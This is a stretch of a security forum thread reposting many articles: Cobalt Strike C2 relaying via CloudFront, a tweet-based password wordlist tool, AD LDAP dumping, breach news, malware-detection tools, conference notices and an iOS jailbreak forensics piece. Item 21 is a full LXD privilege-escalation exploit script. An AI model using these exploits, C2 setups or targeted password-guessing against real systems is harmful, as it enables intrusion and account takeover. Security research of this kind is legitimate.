this blog post as the focus on this post is how to use CloudFront as a relay for CS. For our purposes here, disable all of the AV that you have on the Windows system on which you will run the payload. Select the “HTML Application” payload from the menu shown in the screenshot below. Selecting HTML Application as CS Payload Format Make sure that the “Listener” drop-down menu matches the name that you gave to your listener, which is “rhttps” in this case. Choose “Executable” from the “Method” drop-down menu. Click the “Generate” button, choose a location to save the payload, and then run the payload by double-clicking on the file that was generated. You should observe in your CS-client window that a session has been established! Choosing Payload Listener and Method Session Established Protections Preventing attackers from using CloudFront as a relay in your environment is, unfortunately, not as easy as just disallowing access to CloudFront. Disallowing access to CloudFront would likely “break” a portion of the internet for your company since many websites rely on CloudFront. 
To help mitigate the chances of an attacker establishing a C2 channel that uses CloudFront as a relay, we would suggest a strong application-whitelisting policy to prevent users from running malicious payloads in the first place. Conclusion Using CloudFront as a relay for your C2 server has many benefits that can allow you to bypass multiple protections within an environment and hide the origin of your C2 server. This article walked through all the steps that should be needed to set up a CloudFront distribution to use as a relay for a Cobalt Strike Team Server. Generating CS payloads that evade AV will be discussed in future posts. Join the BHIS Blog Mailing List – get notified when we post new blogs, webcasts, and podcasts. Sursa: https://www.blackhillsinfosec.com/using-cloudfront-to-relay-cobalt-strike-traffic/
  3. Rhodiola

    Utku Sen's Rhodiola

Personalized wordlist generation by analyzing tweets. (A.K.A. crunch2049) The Rhodiola tool is developed to narrow the brute-force combination pool by creating a personalized wordlist for target people. It finds the interest areas of a given user by analyzing his/her tweets, and builds a personalized wordlist.

The Idea
Adversaries need a wordlist or combination-generation tool while conducting password-guessing attacks. To narrow the combination pool, researchers developed a method named "mask attack", where the attacker needs to assume a password's structure. Even if it narrows the combination pool significantly, it's still too large to use for online attacks or offline attacks with low hardware resources. Analyses of leaked password databases showed that people tend to use meaningful English words for their passwords, and most of them are nouns or proper nouns. Other research shows that people choose these nouns from their hobbies and other interest areas. Since people expose their hobbies and other interest areas on Twitter, it's possible to identify these by analyzing their tweets. Rhodiola does that.

Installation
Rhodiola is written in Python 2.7 and tested on macOS and Debian-based Linux systems. To install Rhodiola, run sudo python install.py in Rhodiola's directory. It will download and install the necessary libraries and files. (Note: pip is required.) Rhodiola requires Twitter Developer API keys to work (if you don't have them, you can bring your own data; check the details below). You can get them by creating a Twitter app from here: https://developer.twitter.com/en/docs/basics/getting-started After you get the API keys, open Rhodiola.py with your favourite text editor and edit the following fields: consumer_key = "YOUR_DATA_HERE" consumer_secret = "YOUR_DATA_HERE" access_key = "YOUR_DATA_HERE" access_secret = "YOUR_DATA_HERE"

Usage
Rhodiola has three different usage styles: base, regex and mask. In the base mode, Rhodiola takes a Twitter handle as an argument and generates a personalized wordlist with the following elements: most used nouns and proper nouns, paired nouns and proper nouns, and cities and years related to them. Example command: python rhodiola.py --username elonmusk Example output: ... tesla car boring spacex falcon rocket mars earth flamethrower coloradosprings tesla1856 boringcompany2018 ...

In the regex mode, you can generate additional strings with the provided regex. These generated strings will be appended as a prefix or suffix to the words. For this mode, Rhodiola takes a regex value as an argument. There is also an optional argument, "regex_place", which defines the string placement (can be "prefix" or "suffix"; the default value is "suffix"). Example command: python rhodiola.py --username elonmusk --regex "(root|admin)\d{2}" Example output: ... teslaroot01 teslaroot02 teslaroot03 ... spacexadmin01 spacexadmin02 spacexadmin03 ... tesla1856root99 ... boringcompany2018admin99 ...

In the mask mode, the user can provide hashcat-style mask values. Only ?l (lower-alpha) and ?u (upper-alpha) charsets are available. Example command: python rhodiola.py --username elonmusk --mask "?u?l?u?u?l" Example output: ... TeSLa CaR BoRIng SpACex FaLCon RoCKet MaRS EaRTh FlAMethrower CoLOradosprings TeSLa1856 BoRIngcompany2018 ...
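To illustrate what the mask mode appears to do with each candidate word (this is not Rhodiola's code, just a hypothetical sketch of the behaviour shown in the example output: the mask is applied to the first characters of each word and the rest is left unchanged):

```python
def apply_mask(word, mask="?u?l?u?u?l"):
    charsets = [mask[i + 1] for i in range(0, len(mask), 2)]   # ['u', 'l', 'u', 'u', 'l']
    out = []
    for i, ch in enumerate(word):
        if i < len(charsets):
            out.append(ch.upper() if charsets[i] == "u" else ch.lower())
        else:
            out.append(ch)            # characters beyond the mask stay as-is
    return "".join(out)

for word in ["tesla", "boring", "coloradosprings", "tesla1856"]:
    print(apply_mask(word))           # TeSLa, BoRIng, CoLOradosprings, TeSLa1856
```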
Bring Your Own Data If you don't have any Twitter API keys or you want to bring your own data, you can do it as well. Rhodiola provides you two different options. You can provide a text file which contains arbitrary text data, or you can provide a text file which contains different URLS. Rhodiola parses the texts from those URLs. Example command: python rhodiola.py --filename mydata.txt mydata.txt contains: Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. Example command: python rhodiola.py --urlfile blogs.txt blogs.txt contains: https://example.com/post1.html https://example.com/post2.html https://cnn.com/news.html Demo Video Sursa: https://github.com/tearsecurity/rhodiola
  4. More than a million people have their biometric data exposed in massive security breach Graham Cluley Aug 15, 2019 IT Security and Data Protection A biometrics system used to secure more than 1.5 million locations around the world – including banks, police forces, and defence companies in the United States, UK, India, Japan, and the UAE – has suffered a major data breach, exposing a huge number of records. South Korean firm Suprema runs the web-based biometric access platform BioStar 2, but left the fingerprints and facial recognition data of more than one million people exposed on a publicly accessible database. Privacy researchers Noam Rotem and Ran Locar discovered a total of 27.8 million records totalling 23 gigabytes of data, including usernames and passwords stored in plaintext. Rotem told The Guardian that having discovered the plaintext passwords of BioStar 2 administrator accounts he and Locar were granted a worrying amount of power: “We were able to find plain-text passwords of administrator accounts. The access allows first of all seeing millions of users are using this system to access different locations and see in real time which user enters which facility or which room in each facility, even. We [were] able to change data and add new users.” The researchers claimed they were able to access data from co-working locations in Indonesia and the United States, a UK-based medicine supplier, a gymnasium chain in India and Sri Lanka, and a Finnish car park space developer, amongst others. Perhaps most worryingly of all, however, was that it was possible to access more than one million users’ unencrypted fingerprints and facial biometric records (rather than hashed versions that cannot be reverse-engineered.) The reason why a data breach involving biometric data is worse than one containing just passwords is that you can change your password or PIN code. Your fingerprints? Your face? You’re stuck with them for life. Good luck changing them every time your biometric data gets breached. Tim Erlin, VP of product management and strategy at Tripwire, commented: “As an industry, we’ve learned a lot of lessons about how to securely store authentication data over the years. In many cases, we’re still learning and re-learning those lessons. Unfortunately, companies can’t send out a reset email for fingerprints. The benefit and disadvantage of biometric data is that it can’t be changed.” “Using multiple factors for authentication helps mitigate these kinds of breaches. As long as I can’t get access to a system or building with only one factor, then the compromise of my password, key card or fingerprint doesn’t result in compromise of the whole system. Of course, if these factors are stored or alterable from a single system, then there remains a single point of failure.” Erlin is right to raise concerns that lessons don’t seem to being learnt. Back in 2015, for instance, I described how hackers had breached the systems of the Office of Personnel Management (OPM) in a high profile hack that saw approximately 5.6 million fingerprints stolen, alongside social security numbers, addresses and other personal information. All organisations need to take great care over the biometric information they may be storing about their customers and employees, and ensure that the chances of sensitive data falling into the hands of hackers are minimised or – better yet – eradicated. Suprema’s BioStar 2 database has now been properly secured, and is no longer publicly accessible. 
However, Suprema sounds a little less than keen to inform customers about the security breach. The company’s head of marketing Andy Ahn says that Suprema will undertake an “in-depth evaluation” of the researchers’ findings before making a decision. “If there has been any definite threat on our products and/or services, we will take immediate actions and make appropriate announcements to protect our customers’ valuable businesses and assets,” Ahn is quoted as saying in The Guardian article. Fortunately, at the moment there is no indication that criminals were able to access the highly sensitive data. However, it’s understandable that there should still be concerns that if they had managed to steal the exposed data it could be used for criminal activity and fraud, or even to gain access to supposedly secure commercial buildings. Editor’s Note: The opinions expressed in this guest author article are solely those of the contributor, and do not necessarily reflect those of Tripwire, Inc. Sursa: https://www.tripwire.com/state-of-security/featured/more-million-people-biometric-data-exposed-security-breach/
  5. LDAPDomainDump Active Directory information dumper via LDAP Introduction In an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for gathering information in the recon phase of a pentest of an internal network. A problem is that data from LDAP often is not available in an easy to read format. ldapdomaindump is a tool which aims to solve this problem, by collecting and parsing information available via LDAP and outputting it in a human readable HTML format, as well as machine readable json and csv/tsv/greppable files. The tool was designed with the following goals in mind: Easy overview of all users/groups/computers/policies in the domain Authentication both via username and password, as with NTLM hashes (requires ldap3 >=1.3.1) Possibility to run the tool with an existing authenticated connection to an LDAP service, allowing for integration with relaying tools such as impackets ntlmrelayx The tool outputs several files containing an overview of objects in the domain: domain_groups: List of groups in the domain domain_users: List of users in the domain domain_computers: List of computer accounts in the domain domain_policy: Domain policy such as password requirements and lockout policy domain_trusts: Incoming and outgoing domain trusts, and their properties As well as two grouped files: domain_users_by_group: Domain users per group they are member of domain_computers_by_os: Domain computers sorted by Operating System Dependencies and installation Requires ldap3 > 2.0 and dnspython Both can be installed with pip install ldap3 dnspython The ldapdomaindump package can be installed with python setup.py install from the git source, or for the latest release with pip install ldapdomaindump. Usage There are 3 ways to use the tool: With just the source, run python ldapdomaindump.py After installing, by running python -m ldapdomaindump After installing, by running ldapdomaindump Help can be obtained with the -h switch: usage: ldapdomaindump.py [-h] [-u USERNAME] [-p PASSWORD] [-at {NTLM,SIMPLE}] [-o DIRECTORY] [--no-html] [--no-json] [--no-grep] [--grouped-json] [-d DELIMITER] [-r] [-n DNS_SERVER] [-m] HOSTNAME Domain information dumper via LDAP. Dumps users/computers/groups and OS/membership information to HTML/JSON/greppable output. 
Required options: HOSTNAME Hostname/ip or ldap://host:port connection string to connect to (use ldaps:// to use SSL) Main options: -h, --help show this help message and exit -u USERNAME, --user USERNAME DOMAIN\username for authentication, leave empty for anonymous authentication -p PASSWORD, --password PASSWORD Password or LM:NTLM hash, will prompt if not specified -at {NTLM,SIMPLE}, --authtype {NTLM,SIMPLE} Authentication type (NTLM or SIMPLE, default: NTLM) Output options: -o DIRECTORY, --outdir DIRECTORY Directory in which the dump will be saved (default: current) --no-html Disable HTML output --no-json Disable JSON output --no-grep Disable Greppable output --grouped-json Also write json files for grouped files (default: disabled) -d DELIMITER, --delimiter DELIMITER Field delimiter for greppable output (default: tab) Misc options: -r, --resolve Resolve computer hostnames (might take a while and cause high traffic on large networks) -n DNS_SERVER, --dns-server DNS_SERVER Use custom DNS resolver instead of system DNS (try a domain controller IP) -m, --minimal Only query minimal set of attributes to limit memmory usage Options Authentication Most AD servers support NTLM authentication. In the rare case that it does not, use --authtype SIMPLE. Output formats By default the tool outputs all files in HTML, JSON and tab delimited output (greppable). There are also two grouped files (users_by_group and computers_by_os) for convenience. These do not have a greppable output. JSON output for grouped files is disabled by default since it creates very large files without any data that isn't present in the other files already. DNS resolving An important option is the -r option, which decides if a computers DNSHostName attribute should be resolved to an IPv4 address. While this can be very useful, the DNSHostName attribute is not automatically updated. When the AD Domain uses subdomains for computer hostnames, the DNSHostName will often be incorrect and will not resolve. Also keep in mind that resolving every hostname in the domain might cause a high load on the domain controller. Minimizing network and memory usage By default ldapdomaindump will try to dump every single attribute it can read to disk in the .json files. In large networks, this uses a lot of memory (since group relationships are currently calculated in memory before being written to disk). To dump only the minimal required attributes (the ones shown by default in the .html and .grep files), use the --minimal switch. Visualizing groups with BloodHound LDAPDomainDump includes a utility that can be used to convert ldapdomaindumps .json files to CSV files suitable for BloodHound. The utility is called ldd2bloodhound and is added to your path upon installation. Alternatively you can run it with python -m ldapdomaindump.convert or with python ldapdomaindump/convert.py if you are running it from the source. The conversion tool will take the users/groups/computers/trusts .json file and convert those to group_membership.csv and trust.csv which you can add to BloodHound. License MIT Sursa: https://github.com/dirkjanm/ldapdomaindump
  6. hollows_hunter Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches). Uses PE-sieve (DLL version): https://github.com/hasherezade/pe-sieve.git Clone: Use recursive clone to get the repo together with all the submodules: git clone --recursive https://github.com/hasherezade/hollows_hunter.git Sursa: https://github.com/hasherezade/hollows_hunter
  7. PE-sieve is a light-weight tool that helps to detect malware running on the system, as well as to collect the potentially malicious material for further analysis. Recognizes and dumps variety of implants within the scanned process: replaced/injected PEs, shellcodes, hooks, and other in-memory patches. Detects inline hooks, Process Hollowing, Process Doppelgänging, Reflective DLL Injection, etc. Uses library: https://github.com/hasherezade/libpeconv.git FAQ - Frequently Asked Questions Clone: Use recursive clone to get the repo together with the submodule: git clone --recursive https://github.com/hasherezade/pe-sieve.git Latest builds*: *those builds are available for testing and they may be ahead of the official release: 32-bit 64-bit Read more: Wiki: https://github.com/hasherezade/pe-sieve/wiki logo by Baran Pirinçal Sursa: https://github.com/hasherezade/pe-sieve
  8. Dr.Semu Dr.Semu runs executables in an isolated environment, monitors the behavior of a process, and based on Dr.Semu rules created by you or community, detects if the process is malicious or not. [The tool is in the early development stage] whoami: @_qaz_qaz Dr.Semu let you to create rules for different malware families and detect new samples based on their behavior. Isolation through redirection Everything happens from the user-mode. Windows Projected File System (ProjFS) is used to provide a virtual file system. For Registry redirection, it clones all Registry hives to a new location and redirects all Registry accesses (after caching Registry hives, all subsequent executions are very fast, ~0.3 sec.) See the source code for more about other redirections (process/objects isolation, etc). Monitoring Dr.Semu uses DynamoRIO (Dynamic Instrumentation Tool Platform) to intercept a thread when it's about to cross the user-kernel line. It has the same effect as hooking SSDT but from the user-mode and without hooking anything. At this phase, Dr.Semu produces a JSON file, which contains information from the interception. Detection After terminating the process, based on Dr.Semu rules we receive if the executable is detected as malware or not. Dr.Semu rules They are written in LUA and use dynamic information from the interception and static information about the sample. It's trivial to add support of other languages. Example: https://gist.github.com/secrary/e16daf698d466136229dc417d7dbcfa3 Usage Use PowerShell to enable ProjFS in an elevated PowerShell window: Enable-WindowsOptionalFeature -Online -FeatureName Client-ProjFS -NoRestart Download and extract a zip file from the releases page Download DynamoRIO and extract into DrSemu folder and rename to dynamorio DrSemu.exe --target file_path DrSemu.exe --target files_directory DEMO BUILD Use PowerShell to enable ProjFS in an elevated PowerShell window: Enable-WindowsOptionalFeature -Online -FeatureName Client-ProjFS -NoRestart Download DynamoRIO and extract into bin folder and rename to dynamorio Build pe-parser-library.lib library: Generate VS project from DrSemu\shared_libs\pe_parse using cmake-gui Build 32-bit library under build (\shared_libs\pe_parse\build\pe-parser-library\Release\) and 64-bit one under build64 Change run-time library option to Multi-threaded (/MT) Set LauncherCLI As StartUp Project TODO Solve isolation related issues Update the description, add more details Create a GUI for the tool Limitations Minimum supported Windows version: Windows 10, version 1809 (due to Windows Projected File System) Maximum supported Windows version: Windows 10, version 1809 (DynamoRIO supports Windows 10 versions until 1809) Sursa: https://github.com/secrary/DrSemu
  9. website-checks
website-checks checks websites with multiple services. These are currently: crt.sh, CryptCheck, HSTS Preload List, HTTP Observatory, Lighthouse, PageSpeed Insights, Security Headers, SSL Decoder, SSLLabs, webbkoll, webhint.
Installation
npm i -g danielruf/website-checks
yarn global add danielruf/website-checks
Usage
website-checks example.com
Change output directory
website-checks example.com --output pdf
would save all PDF files to the local pdf directory.
CLI flags
By default all checks (except --ssldecoder) will run. If you want to run only specific checks you can add CLI flags. Currently the following CLI flags will run the matching checks:
--crtsh --cryptcheck --hstspreload --httpobservatory --lighthouse --psi --securityheaders --ssldecoder --ssldecoder-fast --ssllabs --webbkoll --webhint
For example website-checks example.com --lighthouse --securityheaders will run the Lighthouse and Security Headers checks.
Known issues
Missing Chrome / Chromium dependency for the Windows binary (.exe): on Windows it may happen that the bundled binary throws the following error:
UnhandledPromiseRejectionWarning: Error: Chromium revision is not downloaded. Run "npm install" or "yarn install" at Launcher.launch
This is a known issue with all solutions like pkg and nexe and is expected, as Chromium is not bundled with the binary (which would make it much bigger). In most cases it can be solved by globally installing puppeteer or by having Chrome or Chromium installed and in PATH.
Sursa: https://github.com/DanielRuf/website-checks
  10. Fun stuff: https://9gag.com/gag/a6NwnMe
  11. I added support for Windows x64, Linux x86 and Linux x64. https://www.defcon.org/html/defcon-27/dc-27-demolabs.html#Shellcode Compiler
  12. We do not allow illegal activities on the forum, such as gaining access to certain websites or Facebook pages/profiles. Besides, hackforums is a mess.
  13. Mayday.conf ( https://www.mayday-conf.com ) is the first international cyber security conference in Cluj Napoca (24-25 October), and RST is a community partner of the event. The event was born out of a passion for security and its main goal is to help people interested in this field grow. During the event there will be talks on the latest techniques used by pentesters and Incident Responders, as well as topics such as identifying the TTPs used by attackers. Moreover, the event will include CTFs with prizes, cyber exercises and workshops.
To receive real-time notifications you can subscribe to the newsletter on www.mayday-conf.com, follow the Facebook page ( https://www.facebook.com/MayDayCon ) / Twitter ( https://twitter.com/ConfMayday ) or join the Slack group ( https://maydayconf.slack.com/join/shared_invite/enQtNTc5Mzk0NTk0NTk3LWVjMTFhZWM2MTVlYmQzZjdkMDQ5ODI1NWM3ZDVjZGJkYjNmOGUyMjAxZmQyMDlkYzg5YTQxNzRmMmY3NGQ1MGM )
Now for the surprise... Because "sharing is caring", the organizers are offering RST members 10 access vouchers valid for both days. They can be obtained by sending a private message to Nytro (including an email address) until September 1st, and the selection will be based on the following criteria:
- number of posts on the forum
- number of likes and upvotes received on posts
- projects published on the forum
- seniority on RST
URL: https://www.mayday-conf.com
  14. I already knew about this one: https://github.com/IBM/adversarial-robustness-toolbox
  15. Nowadays, the IT Security industry faces new challenges: bad actors can use multiple techniques to extract sensitive data from a target, and a Red Team simulates exactly such an attack. HackTheZone has developed a RedTeam challenge for IT Security enthusiasts that lets attendees push past their limits and use techniques such as WarDriving, Social Engineering, penetration testing and more. All of these skills will be put to use in a real playground: Bucharest. Enrollment in the HackTheZone RedTeam challenge will be available soon on the HackTheZone conference website: https://www.hackthezone.com
The conference will be held at Crystal Palace Ballrooms, Calea Rahovei 198A, Sector 5, Bucharest. Alongside the award ceremony for the HackTheZone RedTeam challenge, we will cover the latest IT Security trends with the aid of our highly certified speakers. For more details about our challenges you can join our community via Slack - https://www.hackthezone.com/slack
  16. Writing shellcodes for Windows x64
On 30 June 2019 By nytrosecurity
A long time ago I wrote three detailed blog posts about how to write shellcodes for Windows (x86 – 32 bits). The articles are beginner friendly and contain a lot of details. The first part explains what a shellcode is and what its limitations are, the second part explains the PEB (Process Environment Block), the PE (Portable Executable) file format and the basics of ASM (Assembler), and the third part shows how a Windows shellcode can actually be implemented. This blog post ports the previous articles to Windows 64 bits (x64) and will not cover all the details explained in the previous posts, so anyone who is not familiar with the concepts of shellcode development on Windows should read them before going further. Of course, the differences between x86 and x64 shellcode development on Windows, including the ASM, are covered here. However, since I already wrote some details about Windows 64 bits in the Stack Based Buffer Overflows on x64 (Windows) blog post, I will just copy and paste them here. As in the previous blog posts, we will create a simple shellcode that swaps the mouse buttons using the SwapMouseButton function exported by user32.dll and gracefully closes the process using the ExitProcess function exported by kernel32.dll.
Full article: https://nytrosecurity.com/2019/06/30/writing-shellcodes-for-windows-x64/
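For context, here is a hedged C sketch (my own illustration, not code from the article) of what the finished shellcode is functionally equivalent to. The real shellcode resolves these APIs by walking the PEB and the export tables by hand; the sketch simply leans on LoadLibrary/GetProcAddress to show the end result.

#include <windows.h>

int main(void)
{
    // Resolve the two APIs dynamically, roughly mirroring what the shellcode
    // does after locating the module bases via the PEB.
    HMODULE user32   = LoadLibraryA("user32.dll");
    HMODULE kernel32 = GetModuleHandleA("kernel32.dll");

    BOOL (WINAPI *pSwapMouseButton)(BOOL) =
        (BOOL (WINAPI *)(BOOL))GetProcAddress(user32, "SwapMouseButton");
    void (WINAPI *pExitProcess)(UINT) =
        (void (WINAPI *)(UINT))GetProcAddress(kernel32, "ExitProcess");

    if (!pSwapMouseButton || !pExitProcess)
        return 1;

    pSwapMouseButton(TRUE);  // swap the left and right mouse buttons
    pExitProcess(0);         // gracefully terminate the process
    return 0;
}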
  17. Info stealing Android apps can grab one time passwords to evade 2FA protections
Google restricted SMS controls. Hackers found a way around it.
By Charlie Osborne for Zero Day | June 18, 2019 -- 09:46 GMT (10:46 BST) | Topic: Security
Malicious Android apps have been uncovered which are able to access one-time passwords (OTPs) in order to bypass two-factor authentication (2FA) security mechanisms. Researchers from ESET said on Thursday that the apps impersonated a cryptocurrency exchange based in Turkey, known as BtcTurk, and were available for download in Google Play.
Mobile applications seeking to bypass 2FA in order to hijack a victim's device used to often ask for the permissions required to seize control of SMS settings, which would allow the malicious software to intercept 2FA codes designed to add a secondary layer of security to online accounts. Earlier this year, Google restricted SMS and Call Log permissions in Android to stop developers from gaining access to these sensitive permissions without personally making their case in front of the tech giant first. The crackdown caused chaos for some legitimate developers whose apps were suddenly at risk of losing useful features. When it came to malicious apps, however, the change in Google's policies stripped away many of the options available to abuse SMS and Call Log controls to bypass 2FA.
In the apps found by ESET, the developer has come up with a way to circumvent Google's changes. The first app was uploaded to Google Play on June 7, 2019, under the developer and application name "BTCTurk Pro Beta." The second, named "BtcTurk Pro Beta," falls under the developer name "BtSoft." After one of these applications has been downloaded and launched, the software requests a permission called Notification access, which gives the app the power to read notifications displayed by other apps on the device, to dismiss them, or to click any buttons they contain. The app then shows a fake login request to access the Turkish cryptocurrency platform. If credentials are submitted, an error page is displayed while the account credentials are whisked away to the attacker's command-and-control (C2) server.
"Instead of intercepting SMS messages to bypass 2FA protection on users' accounts and transactions, these malicious apps take the OTP from notifications appearing on the compromised device's display," ESET says. "Besides reading the 2FA notifications, the apps can also dismiss them to prevent victims from noticing fraudulent transactions happening."
The malicious apps also have filters in place while scanning notifications on the lock screen, so only alerts of interest are targeted. Keywords include "mail," "outlook," "sms," and "messaging."
The technique is new and effective, but only to the extent of how much information can be stolen from a notification box. The OTP may not be fully shown in a mobile notification pop-up, and while the interception method could also theoretically be used to grab email-based one-time passwords, message lengths vary and so the attack vector may not always be successful.
Thankfully, fewer than 100 users are believed to have installed the apps before they were reported to Google on June 12 and removed. However, as the Notification access permission was introduced in Android 4.3, the security team has suggested that the 2FA bypass technique could affect "almost all active Android devices."
Sursa: https://www.zdnet.com/article/info-stealing-android-apps-can-now-access-passwords-to-avoid-2fa-protections/
  18. NASA hacked because of unauthorized Raspberry Pi connected to its network
NASA described the hackers as an "advanced persistent threat," a term generally used for nation-state hacking groups.
By Catalin Cimpanu for Zero Day | June 21, 2019 -- 20:46 GMT (21:46 BST) | Topic: Security
[Image: NASA's Curiosity Mars rover self-portrait at the "Buckskin" drill site, Aug. 5, 2015. NASA/JPL-Caltech/MSSS]
A report published this week by the NASA Office of Inspector General reveals that in April 2018 hackers breached the agency's network and stole approximately 500 MB of data related to Mars missions. The point of entry was a Raspberry Pi device that was connected to the IT network of the NASA Jet Propulsion Laboratory (JPL) without authorization or going through the proper security review.
Hackers stole Mars missions data
According to the 49-page OIG report, the hackers used this point of entry to move deeper inside the JPL network by hacking a shared network gateway. The hackers used this network gateway to pivot inside JPL's infrastructure and gained access to the network that was storing information about NASA JPL-managed Mars missions, from where they exfiltrated information. The OIG report said the hackers used "a compromised external user system" to access the JPL missions network.
"The attacker exfiltrated approximately 500 megabytes of data from 23 files, 2 of which contained International Traffic in Arms Regulations information related to the Mars Science Laboratory mission," the NASA OIG said. The Mars Science Laboratory is the JPL program that manages the Curiosity rover on Mars, among other projects.
Hackers also breached NASA's satellite dish network
The primary role of NASA's JPL division is to build and operate planetary robotic spacecraft such as the Curiosity rover, or the various satellites that orbit planets in the solar system. In addition, the JPL also manages NASA's Deep Space Network (DSN), a worldwide network of satellite dishes that are used to send and receive information from NASA spacecraft in active missions. Investigators said that besides accessing the JPL's mission network, the April 2018 intruder also accessed the JPL's DSN IT network. Upon the discovery of the intrusion, several other NASA facilities disconnected from the JPL and DSN networks, fearing the attacker might pivot to their systems as well.
Hackers described as an APT
"Classified as an advanced persistent threat, the attack went undetected for nearly a year," the NASA OIG said. "The investigation into this incident is ongoing."
The report blamed the JPL's failure to segment its internal network into smaller segments, a basic security practice that prevents hackers from moving inside compromised networks with relative ease. The NASA OIG also blamed the JPL for failing to keep the Information Technology Security Database (ITSDB) up to date. The ITSDB is a database for the JPL IT staff, where system administrators are supposed to log every device connected to the JPL network. The OIG found that the database inventory was incomplete and inaccurate. For example, the compromised Raspberry Pi board that served as a point of entry had not been entered in the ITSDB inventory.
In addition, investigators also found that the JPL IT staff was lagging behind when it came to fixing security-related issues. "We also found that security problem log tickets, created in the ITSDB when a potential or actual IT system security vulnerability is identified, were not resolved for extended periods of time, sometimes longer than 180 days," the report said.
Was APT10 behind the hack?
In December 2018, the US Department of Justice charged two Chinese nationals with hacking cloud providers, NASA, and the US Navy. The DOJ said the two hackers were part of one of the Chinese government's elite hacking units, known as APT10. The two were charged with hacking the NASA Goddard Space Center and the Jet Propulsion Laboratory. It is unclear whether this is the "advanced persistent threat" that hacked the JPL in April 2018, because the DOJ indictment did not provide a date for APT10's JPL intrusion.
Also in December 2018, NASA announced another breach. This was a separate incident from the April 2018 hack. This second breach was discovered in October 2018, and the intruder(s) stole only NASA employee-related information.
Sursa: https://www.zdnet.com/article/nasa-hacked-because-of-unauthorized-raspberry-pi-connected-to-its-network/
  19. Flags can be everywhere: RST{RSTCON_STEAGUL_DE_PE_FORUM}
  20. Wild West Hackin' Fest 2017 Presented by Deviant Ollam: https://enterthecore.net/ Many organizations are accustomed to being scared at the results of their network scans and digital penetration tests, but seldom do these tests yield outright "surprise" across an entire enterprise. Some servers are unpatched, some software is vulnerable, and networks are often not properly segmented. No huge shocks there. As head of a Physical Penetration team, however, my deliverable day tends to be quite different. With faces agog, executives routinely watch me describe (or show video) of their doors and cabinets popping open in seconds. This presentation will highlight some of the most exciting and shocking methods by which my team and I routinely let ourselves in on physical jobs. ________________________________________________________________ While paying the bills as a security auditor and penetration testing consultant with The CORE Group, Deviant Ollam is also a member of the Board of Directors of the US division of TOOOL, The Open Organisation Of Lockpickers. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a GSA certified safe and vault technician and inspector. At multiple annual security conferences Deviant runs the Lockpick Village workshop area, and he has conducted physical security training sessions for Black Hat, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point. His favorite Amendments to the US Constitution are, in no particular order, the 1st, 2nd, 9th, & 10th. Deviant's first and strongest love has always been teaching. A graduate of the New Jersey Institute of Technology's Science, Technology, & Society program, he is always fascinated by the interplay that connects human values and social trends to developments in the technical world. While earning his BS degree at NJIT, Deviant also completed the History degree program at Rutgers University.
  21.
#!/usr/bin/env bash
# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#          Victor Lasa (vowkin)
# ----------------------------------

# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import $filename --alias alpine && lxd init --auto
  echo -e "[*] Listing images...\n" && lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0

while getopts ":f:h" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi

Sursa: https://www.exploit-db.com/exploits/46978?utm_source=dlvr.it&utm_medium=twitter
  22. Forensic Implications of iOS Jailbreaking June 12th, 2019 by Oleg Afonin Jailbreaking is used by the forensic community to access the file system of iOS devices, perform physical extraction and decrypt device secrets. Jailbreaking the device is one of the most straightforward ways to gain low-level access to many types of evidence not available with any other extraction methods. On the negative side, jailbreaking is a process that carries risks and other implications. Depending on various factors such as the jailbreak tool, installation method and the ability to understand and follow the procedure will affect the risks and consequences of installing a jailbreak. In this article we’ll talk about the risks and consequences of using various jailbreak tools and installation methods. Why jailbreak? Why jailbreak, and should you jailbreak at all? Speaking of mobile forensics, jailbreaking the device helps extract some additional bits and pieces of information compared to other acquisition methods. Before discussing the differences between the different acquisition methods, let’s quickly look at what extraction methods are available for iOS devices. Logical acquisition Logical acquisition is the simplest, cleanest and the most straightforward acquisition method by a long stretch. During logical acquisition, experts can make the iPhone (iPad, iPad Touch) backup its contents. In addition to the backup (and regardless of whether or not the user protected backups with a password), logical acquisition enables experts to extract media files (pictures and videos), crash logs and shared files. Logical acquisition, when performed properly, yields a comprehensive set of data including (for password-protected backups) the content of the user’s keychain. Requirements: the iOS device must be working and not in USB Restricted mode; you must be able to connect it to the computer and perform the pairing procedure (during this step, iOS 11 and 12 will require the passcode). Alternatively, one can use an existing pairing record extracted from the user’s computer. A backup extracted during the course of logical acquisition may come out encrypted. If this is the case, experts may be able to reset the backup password, an action that carries consequences on its own (more information in Step by Step Guide to iOS Jailbreaking and Physical Acquisition, look up the “If you have to reset the backup password” chapter). Jailbreaking the device is a viable alternative to resetting the backup password. After you jailbreak, you’ll be able to extract all of the same information as available in the backup, and more. In addition, you’ll be able to view the user’s backup password in plain text (refer to “Extracting the backup password from the keychain” in the same article). Over-the-air (iCloud) extraction Remote extraction of device data 